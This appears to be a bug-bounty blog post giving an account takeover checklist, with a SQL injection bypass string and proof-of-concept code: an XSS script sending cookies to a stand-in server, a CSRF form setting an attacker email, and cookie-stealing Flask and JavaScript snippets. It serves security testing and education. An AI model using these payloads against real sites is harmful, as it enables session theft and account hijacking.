Penetration Testing Tools, ML and Linux Tutorials
  • Data Science
    • Artificial Intelligence
    • Data Analyst
    • Deep Learning
    • Machine Learning
  • Kali
    • Exploits
    • OSINT
    • Tools
    • Bug Bounty
    • Resources
  • Linux
    • DevOps
    • Docker
    • Kubernetes
    • Git
  • Forensics
    • Cyber Forensics
    • Digital Forensics
    • Linux Forensics
    • Network Forensics
    • Threat Analyst
    • Incident Response
  • SQL
  • CVE
  • Share
  • News
  • Services
    • CrackMyHash
  • Small Business
  • Resources
  • White Papers
  • Crypto News
  • Programming
    • Python
    • NodeJS
    • Java
    • Javascript
    • PHP
  • Android
  • SEO
  • Microsoft
    • Azure
    • Dot Net
    • Powershell
  • Networking
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
  • Data Science
    • Artificial Intelligence
    • Data Analyst
    • Deep Learning
    • Machine Learning
    AI, ML and Data Science Books
    Useful Data Science Topics
    Data science blogs
    Data Science Resources
    Previous Next
  • Kali
    • Exploits
    • OSINT
    • Tools
    • Bug Bounty
    • Resources
    CVE-2022-26809 RCE Exploit
    XLL Phishing
    The Firmware Security Analyzer
    Apache Tomcat RCE
    Previous Next
  • Linux
    • DevOps
    • Docker
    • Kubernetes
    • Git
    Git Cheat Sheet
    DevSecOps Playbook
    K3s – Lightweight Kubernetes
    Linux cheat sheet
    Previous Next
  • Forensics
    • Cyber Forensics
    • Digital Forensics
    • Linux Forensics
    • Network Forensics
    • Threat Analyst
    • Incident Response
    Digital Forensics Guide
    Digital Forensics and Incident Response SOC
    Tracking history of USB events on Linux
    Cyber Security Forensics
    Previous Next
  • SQL
    The Rust SQL Toolkit
    Postgres to Elasticsearch sync
    Awesome SQL Server
    Universal Command Line interface for SQL databases
    Awesome MySQL Resources
    Previous Next
  • CVE
  • Share
  • News
  • Services
    • CrackMyHash
Penetration Testing Tools, ML and Linux Tutorials Penetration Testing Tools, ML and Linux Tutorials
  • Data Science
    • Artificial Intelligence
    • Data Analyst
    • Deep Learning
    • Machine Learning
    AI, ML and Data Science Books
    Useful Data Science Topics
    Data science blogs
    Data Science Resources
    Previous Next
  • Kali
    • Exploits
    • OSINT
    • Tools
    • Bug Bounty
    • Resources
    CVE-2022-26809 RCE Exploit
    XLL Phishing
    The Firmware Security Analyzer
    Apache Tomcat RCE
    Previous Next
  • Linux
    • DevOps
    • Docker
    • Kubernetes
    • Git
    Git Cheat Sheet
    DevSecOps Playbook
    K3s – Lightweight Kubernetes
    Linux cheat sheet
    Previous Next
  • Forensics
    • Cyber Forensics
    • Digital Forensics
    • Linux Forensics
    • Network Forensics
    • Threat Analyst
    • Incident Response
    Digital Forensics Guide
    Digital Forensics and Incident Response SOC
    Tracking history of USB events on Linux
    Cyber Security Forensics
    Previous Next
  • SQL
    The Rust SQL Toolkit
    Postgres to Elasticsearch sync
    Awesome SQL Server
    Universal Command Line interface for SQL databases
    Awesome MySQL Resources
    Previous Next
  • CVE
  • Share
  • News
  • Services
    • CrackMyHash
Blue Glowing Keyboard Enter Button And Red Glowing Security Padlock Icon, Security Concept For Shopping And Browsing On The Internet
Bug Bounty

BugBounty – Account Takeover Checklist

Stella Sebastian
Posted by Stella Sebastian November 12, 2021
BugBounty

Account Takeover Checklist


  • login:
    •  check if you are able to brute force the password
    •  Test for OAuth misconfigurations
    •  check if you are able to bruteforce the login OTP
    •  check for JWT mesconfigurations
    •  Test for SQL injection to bypass authenticationadmin" or 1=1;--
    •  check if the application validates the OTP or Token
  • password reset:
    •  check if you are able to brute force the password reset OTP
    •  test for token predectability
    •  test for JWT misconfigurations
    •  check if the password reset endpoint is vulnerable to IDOR
    •  check if the password reset endpoint is vulnerable to Host Header injection
    •  check if the password reset endpoint is leaking the token or OTP in the HTTP response
    •  check if the application validates the OTP or Token
    •  test for HTTP parameter Pollution (HPP)
  • XSS to Account Takeover:
    •  if the application does not use auth token or you can’t access the cookies because the “HttpOnly” flag, you can obtain the CSRF token and craft a request to change the user’s email or password
    •  try to exfiltrate the cookies
    •  try to exfiltrate the Auth Token
    •  if the cookie’s “domain” attribute is set, search for xss in the subdomains and use it to exfiltrate the cookies

PoC Example

<script>
    /*
    this script will create a hidden <img> element
    when the browser tries to load the image
    the victim's cookies will be sent to your server
    */

    var new_img = document.createElement('img');
    new_img.src = "http://yourserver/" + document.cookie;
    new_img.style = 'display: none;'
    document.body.appendChild(new_img);
</script>
  • CSRF to Account Takeover:
    •  check if the email update endpoint is vulnerable to CSRF
    •  check if the password change endpoint is vulnerable to CSRF

PoC Example

    <html>
        <head>
            <title>CSRF PoC</title>    
        <head>
        <body>
            <form name='attack' action='https://example.com/update-email' method='POST'>
                <input type="hidden" name="new_email" value="attacker@evil.com">
                <input type="submit" name="submit" value="submit" hidden>
            <form>
            <script>
                document.attack.submit.click()
            </script>
        </body>
    </html>
  • IDOR to Account Takerover:
    •  checck if the email update endpoint is vulnerable to IDOR
    •  check if the password change endpoint is vulnerable to IDOR
    •  check if the password reset endpoint vulnerable to IDOR
  • subdomain takeover:
    •  first-order: check if you can takeover xyz.example.com, you can host any malicious code to steal users info or cookies

PoC Example

#!/usr/bin/python3
from flask import *

app = Flask(__name__)

@app.route('/')
def cookie_sniffer():
    for c_name, c_value in request.cookies.items():
        print(c_name + ': ' + c_value)
    return 'Hello, world'
if __name__ == '__main__':
    app.run(port=80)
  •  second-order (broken link hijacking): if you found a broken link in a webpage (https://nonexistentlink.com/app.js) and you can takeover this domain, you can host any malicious javascript file and use it to steal users info or cookies

PoC Example

user_cookies = {
    "cookies": document.cookie
}

var xhttp = new XMLHttpRequest();
xhttp.open("POST", "/store-cookies", true);
xhttp.send(JSON.stringify(user_cookies));

Github Link
Cyber Threat Intel

Tags: Account Takeover bruteforce bugbounty csrf IDOR JWT Subdomain TakeOver XSS
0 Shares
Share on Facebook Share on Twitter Share on Pinterest Share on Email
Stella Sebastian November 12, 2021
Previous Article Cyber Threat Intel
Next Article NodeJS Package List

Leave a Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Latest Posts

CVE-2022-26809 RCE Exploit

May 19, 2022

XLL Phishing

May 19, 2022

The Firmware Security Analyzer

May 18, 2022

Git Cheat Sheet

May 17, 2022

You Might Also Enjoy

Exploits

CVE-2022-26809 RCE Exploit

May 19, 2022
Tools

The Firmware Security Analyzer

May 18, 2022
Tools

Apache Tomcat RCE

May 17, 2022
Resources

RedTeam Physical Tools

May 16, 2022
Load More
  • ABOUT
  • ADVERTISEMENT
  • TEAM
  • JOBS
  • CONTACT
  • PRIVACY POLICY
  • DISCLOSURE

© 2021 Reconshell All Rights Reserved.